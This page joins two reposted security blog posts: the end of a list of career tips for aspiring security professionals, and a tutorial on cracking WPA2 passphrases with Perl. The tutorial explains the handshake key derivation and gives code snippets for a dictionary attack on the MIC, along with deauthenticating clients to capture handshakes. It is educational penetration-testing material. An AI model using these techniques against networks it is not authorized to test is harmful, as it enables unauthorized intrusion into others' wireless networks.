about malicious Microsoft Office macros. I decided to dive into that and started to do work geared towards using VBA macros in client side attacks. 6. Start a blog This is something I cannot stress enough. By starting a blog, you are creating a portfolio of all your work. This is something other students and professionals can reference. Employers also like it as it details all of your work. This goes with tip 5. As you do your own research/work, write about it. Not only will you be contributing to the community but you will also be building up a portfolio. 7. Keep your head up As I previously mentioned, the security industry is awesome about mentoring. I should also note that there are also people that find joy in tearing you and your work down. As you learn and grow, realize that you are not an expert in everything and you are human. Humans make mistakes, so you will too. When that happens, chalk it up as a learning experience. Don’t get discouraged or angry. The industry revolves around learning, no matter how brilliant you are. For example: I did some research with Alternate Data Streams and using them with PowerShell and VBScript to obtain persistence on a compromised host. I did as much research as I could, wrote some code, published it and wrote a blog post. I was just entering into technology when Windows XP was phasing out so I had no experience with Alternate Data Streams. All I had was what I read and the code I wrote. When I published my blog post, I made the mistake of claiming this method of persistence as “Fileless”. As soon as I shared my post, I got torn apart by forensic and Incident Response professionals. They bashed me since Alternate Data Streams are not fileless, as I claimed them to be in my post. To be honest, I felt dumb and was tempted to just delete the post all together. This will happen to anyone that contributes, I promise. Instead of getting discouraged, I remained professional, fixed my blog post and thanked those who jumped at the opportunity to smack me in the face. I’m glad they did because now, I know that Alternate Data Streams are not fileless. I took that as an opportunity to learn from those who are smarter than me. Again, just keep learning. 8. Remember where you came from As you grow as a student and professional, you will likely become an expert in the field at some point. When this happens, don’t turn into a gigantic asshole. As I previously mentioned, the security industry is awesome about mentoring but there are also people who will sit and wait for the opportunity to bring you down. A lot of people see those new to the industry as “n00bs”, “dumb” and “inexperienced” and in turn, won’t give them the time of day. When someone comes to you with a question, no matter how dumb, answer them. They are asking you for a reason and being an asshole about it helps nobody. You were in that spot once so when someone approaches you (or “sticks with you”, as mentioned in tip 4), take them in and give them guidance. I have started to see that the security industry is kind of like High School. There are different groups with different attitudes. Someone just entering the industry feels exactly like the first day of high school. They just want a friend. If you invest in someone, you will help grow them into a professional. This cycle repeats, so they will then hopefully do the same thing for the next rookie, etc. 9. Get yourself out there Go to conferences and hang out with people. This is even more important when you are trying to get into the industry. By going to conferences, you can talk to people that you may see as an idol. Almost everyone will sit down with you and talk, because they understand the concept of not being an asshole. Those are the people you need to stick by. Example: I started my journey into information security in 2013. I knew nothing and I knew nobody. I had a small presence on Twitter where I just followed some security guys, but that was it. I couldn’t afford to go to a conference, so I didn’t. I made a comment on Twitter one day about wanting to go to DerbyCon sometime and was met with open arms. Tickets were sold out, but someone offered to sell me their ticket. I was thrilled, but couldn’t afford to buy the ticket or hotel, so I politely declined. A few minutes later, that same person decided to just give me their ticket. They didn’t know me or what I was about, but they gave me their ticket anyway. I told my parents that I was going to this conference and that I would be sleeping in my car. Luckily, they decided to pay for the hotel. I ended up going to DerbyCon in 2013 and had the time of my life. I met some awesome people, made some amazing friends and saw some awesome talks. Going to the conference, I knew nobody. After the conference, I felt like a part of the family. 10. Stay humble There is not a single person that is an expert in everything. There will always be someone smarter than you in certain areas. Put your ego aside and accept that you are not the smartest expert in the field. The moment that your ego gets in the way is the moment that you stop learning and fall behind. Share your knowledge and expertise with others and take in the knowledge and expertise of others. Sharing is caring. All I can say is stay true to yourself, contribute, get your name out there and never stop learning. When given the opportunity, share your experiences and knowledge with those who want to learn. Ask questions, learn and get in the weeds. The last thing the industry needs is a “professional” who runs Nessus and puts their logo on the report. And most importantly, keep a good attitude and have fun! –@enigma0x3 Sursa: https://enigma0x3.wordpress.com/2015/04/15/10-tips-for-aspiring-security-professionals/

Cracking WPA2 With Perl Posted on May 7, 2015 by trevelyn Introduction Before we begin, let’s take a look at how the process of WPA2 encryption works. I feel this is a very necessary step for this advanced subject. How could we possibly begin to write an application to crack wpa2 if we have no idea how the protocol/authentication methods work? Also, I would like to note that I do realize that this is incredibly absurd to use the system administration tool Perl to do this, since it is quite slow in comparison to C programming for these heavy lifting tasks (we will see why later) (which I start you off with HERE), but it is still a good exercise to get familiar with the actual WPA2 cracking process for those already familiar with Perl. Requirements A packet capture file containing a WPA2 4-way handshake, and a single beacon frame from the AP – This is for simply viewing the values using a binary to hex tool for network packets, such as Wireshark while coding your own tool with this article. I will be using Wireshark for a few examples and I also have prepared my own 4-way+1 beacon packet capture file that you can download here. To use the code that I write, you will need a few Perl modules: Net::Pcap – For packet dis-assembly. Crypt::PBKDF2 – PMK hashing. Digest::SHA IO::File – Reading files faster than Perl’s open() function. Terms Used Symmetric Key Algorithm or SKA – Cryptography method which uses identical keys to encrypt plain text data and decrypt cipher, or encrypted text. Pre-Shared Key – The key, or WPA2 password, used for the SKA process. EAP, or Extensible authentication Protocol – the actual protocol for transporting WPA2 encrypted data (not to be confused with other protocols, such as 802.11) Pairwise Master Key (PMK) – a string derived using the EAP framework which is used in the process of creating the PTK Pairwise Transient Key, or PTK – Message Integrity Code, or MIC – a checksum that is used to authenticate an encrypted message. It is often used as “MAC” for “Message Authentication Code” but since we already use MAC in computer communications to mean the hardware address of a radio, we use MIC. MAC Address – 6 byte, unique, network hardware address, e.g. “01:23:45:67:89:01?. BSSID or Basic Service Set Identifier, MAC address of the AP radio. ESSID or Extended Service Set Identifier, Network name, e.g. “Free WiFi”, or “linksys”. Nonce – random number used for initiating an encrypted communication. “Station” – refers to a wireless client on the BSS. “AP” Access Point – refers to the actual wireless access point or router. Radio – used synonymously with WiFi adapter or Network Interface Card, or NIC for short. RFMON or Radio Frequency Monitor Mode – Passive listening to 802.11 traffic with a special driver for the radio. Handshake – an authentication process used by parties wishing to communicate using encryption to protect the transmitted data. Trolling for APs If you analyze a packet capture file of 802.11 packets, you may see your client sending out “probe request” packets. These request packets are to stimulate nearby APs into sending out information such as the router/AP capabilities and name. The router’s response will be a packet known as a “probe response.” This is generally how all devices including our phones and tablets search for nearby WiFi access points. This type of “scanning,” or “trolling” in the case of noisy-wardriving phones and tablets, for APs is known as “active scanning.” it does not require a client radio to be in “monitor mode” or RFMON mode. Open System Authentication When a client station wants to connect to an access point, e.g. when we select it in our supplicant software or tap on the network name on our phone screens to connect, it first goes through the process of authentication which is often open system authentication, or OSA. OSA is a four-way handshake style process that must be completed before we go further. This process has often been compared to simply plugging a device into a wired network, e.g. the actual action of pushing the Ethernet cable into the laptop and the network port or switch. 1. Station –> Authentication Request –> AP. 2. AP –> Authentication Response –> Station. Each one of these is a single unique 802.11 packet. This is where MAC address filtering is used. If the AP is set up to only allow certain MAC addresses of clients, which is a poor method of securing the network and should not be used alone, and the MAC address of the system or station which initiated the process is not in the AP’s “white-list” the station is then rejected from the authentication process. System Association To finally “associate” the station system with the network/AP the station initiates an association by sending the AP an “association request.” The AP then updates a few tables, allocates resources (similar to starting up a program in a computer, the AP actually makes memory space for things for the station), and synchronizes with the station finishing the association process. This is, of course, if the AP accepts the station as a client. Below are the steps involved. 1. Station –> Association Request –> AP. 2. AP –> Association Response –> Station. Pairwise Master Key (PMK) The station already knows the PMK, or Pairwise Master Key value. This is pre-calculated by the station supplicant software using the following algorithm, PBKDF2(SHA1,4096,SALT_LEN,OUTPUT_LEN) where the SHA1 means that we are using the SHA1 cryptographic hash function. The number 4096 means that we are running the PBKDF2() function 4096 times for “key stretching” which makes the process of offline-brute-force cracking of the WPA2 passphrase that much harder. The SALT_LEN refers to the salt length of the encryption function, which is the length of the network name, since the network name, or ESSID, is used as the salt. The OUTPUT_LEN refers to the how long we want the output string to be in bytes. Here is an example PMK directly from the pages of my book, 9051BA43660CAEC7A909FBBE6B91E4685F1457B5A2E23660D728AFBD2C7ABFBA Now that the station and the AP know the PMK, we can move on to the next step, the 4-way handshake. WPA2 4 Way Handshake You may have heard of this “4-way handshake” process before, if you have ever used the Aircrack-NG suite of 802.11 penetration testing tools. This process starts with the AP creating a string, called an A-nonce, which stands for “AP Nonce.” The animation below shows how to view the A-nonce in Wireshark using the capture packet file I offer in the beginning of this article. Gathering the AP nonce using Wireshark The station also generates it’s own nonce value, called the S-nonce. The animation below shows how to access the S-nonce using Wireshark, Gathering the station nonce from the 802.11 packets Okay, let’s get our hands dirty. This is going to be complicated so maybe we should use a writing pad and take some notes? The A-nonce is first sent to the Station by the AP. The Station uses the PMK to calculate the Pairwise Transient Key, or PTK. This is done using a Pseudo-Random Function, or PRF. The PRF loops over a simple integer variable, let’s call it $i for the time being (i is commonly used in for() loop examples), starting at $i = 0, and stopping when $i == 3 – so four times total. During each loop, a new string is constructed by concatenating the hexadecimal byte value of the string “Pairwise key expansion \0\0” – which is “5061697277697365206b657920657870616e73696f6e00? and sometimes just referred to as PKE in technical documentation, both of the MAC addresses for the station radio and the AP radio, the A-nonce and the S-nonce, a zero “0”, and finally $i. PKE+MAC0+MAC1+ANONCE+SNONCE+0+$i+PKE+MAC0+MAC1+ANONCE+SNONCE+0+$i+PKE+MAC0+MAC1+ANONCE+SNONCE+0+$i+PKE+MAC0+MAC1+ANONCE+SNONCE+0+$i The “Pairwise key expansion \0\0” string is actually part of the IEEE 802.11i-2004. It literally is a string with two null bytes at the end of it. We encoded it into hex by taking the case-sensitive ASCII values of each letter in decimal and calculating their individual hexadecimal values. For example, 80 is the ASCII (decimal) value for the capital “P” and 97 is the ASCII (decimal) value for “a” which are the first two letters of our string. So we first calculate the hexadecimal value for these two numbers, which in base 16 become, 50 and 61 respectively. Notice the first two bytes of the string, “5061697277697365206b657920657870616e73696f6e00?, are 50 and 61? We do this for the entire string including the two null bytes at the end, which we simply denote using a single 0 for each. To make this even more complex, the order in which all of these values are concatenated, matters! In the string above, we actually have to use the MAC address (station or AP) that is lowest in hexadecimal value first, and same goes for the nonce values. The nonce which is lowest in hexadecimal value first in our string as well. Before the string becomes part of the PTK, is is packed using the pack() Perl function and sent into the HMAC_SHA1() function along with the PMK string that acts as a “key.” The value returned from the HMAC_SHA() function is then concatenated to an empty string, let’s call it $ptkGen. As $i increments to 1, the process starts over and the final result of the new iteration is then appended to the value in $ptkGen (itself). After all 4 iterations are complete, The PTK is then completely calculated as four concatenated strings into $ptkGen by the station. (Well, not really, I am sure the AP doesn’t use Perl. We do for this exercise). Next, the station sends the AP the S-nonce and the Message Integrity Check or MIC value. This MIC value is what we will finally use to crack the PSK. Below is an animation I made to show how to check an MIC in the 4-way handshake by hand using Wireshark. Gathering the MIC integrity check using Wireshark Aircrack-NG and our Perl code only really needs two of the 4 packets in a four-way handshake. This is because the first two packets have both the A-Nonce and S-Nonce values in them AND the MIC. The second two packets also have the same information. We cannot, however, crack the key with just packets 2 and 4, or 1 and 3. The MIC is the “key” to our treasure, so to speak. This means that for each word in our dictionary file, we are going to go through this entire process over-and-over calculating a new PMK and PTK, hash the message body of the (captured) transmitted packet and check the MIC value. If the MIC value that we have calculated matches that in the 802.11 packet, then we have used the correct PSK in the prcess and thus know the secret password to the network. Heavy lifting for Perl! The message body can be obtained from the packet using the following line of Perl, $msg = unpack("H*",substr($pkt,60,121)); This is the 60th to the 121st bytes in the packet using the packet’s very first byte as an offset. We assign the message body to $msg. The message is what we finally hash using the PTK to calculate the MIC. First, need to take out the MIC from the message body. By “take out” we need to actually “zero-out” the MIC, and we do so with the Perl substitution operator with the following 2 lines, my $pad = "0"x32; # 16 null bytes for padding $msg =~ s/$mic/$pad/i; # remove the WPA2 MIC value string This is two lines of code, just so we don’t have a single line with 55 “0” characters in length, not including the comment. We will, once again, be using the HMAC_SHA1() function from the Digest::HMAC_SHA1 Perl module to check the MIC with our PTK. We do so by passing it the (packed up) value of the message body, $msg and the first 32 bytes of the (packed up) PTK, $ptk like so: my $digest = hmac_sha1(pack("H*",$msg),pack("H*",substr(unpack("H*",$ptk),0,32))); Now, we check the sub-string of bytes 1 through 16 of the digest, $digest, with that of the MIC, $mic, like so: if(substr(unpack("H*",$digest),1,16) eq substr($mic,1,16)){ print "PTK: ",unpack("H*",$ptk),"\n"; print "\n\n\tKEY FOUND: [ ",$psk," ] \n\n"; exit; # we are done } And that is all I did to create a simple brute-force tool, like (but not as efficient as the (oh the beautiful language of C <3) GO LEARN C RIGHT NOW! >) Aircrack-NG suite. Below is the exact same code I used in my incredibly-boring book Penetration Testing with Perl. I have added lots of comments, and for those who have read all the way through this text (or simply understand how encrypted communication works), this should not resemble “write-only” code. Conclusion This is a proof of concept. Stimulating and picking apart the 802.11 transactions with Wireshark is recommended and my WEAKERTHAN Linux distribution has all of the necessary tools to do so. By “stimulating,” I simply mean, using Aircrack-NG’s Aireplay-NG to de-autheticate a client causing it to re-authenticate using the 4-way handshake process described above. We do this because if we do, in fact, crack the PSK, or WPA2 passphrase, we can de-crypt the traffic using Wireshark- if and only if (to my knowledge at least) this 4-way handshake is in the packet trace. To make things clear with my readers – I don’t have customers. I don’t make money for writing weblog posts or code. I am not an engineer or college graduate for that matter. I am simply passionate about information security and 802.11, and love sharing what I find or create. PLEASE email me or comment if I have left something out of this, or any article that I write! To my knowledge, there was not a single instance of cracking WPA2 using Perl online anywhere before I wrote my book or created this code. I went through a lot of trial and error, but figured it all out myself (Here is proof) a la reversing the protocol in Wireshark and reading about it from the IEEE. Besides the few Perl modules used for hashing functions, I wrote this from scratch. ~Douglas Sursa: http://weaknetlabs.com/main/?p=2969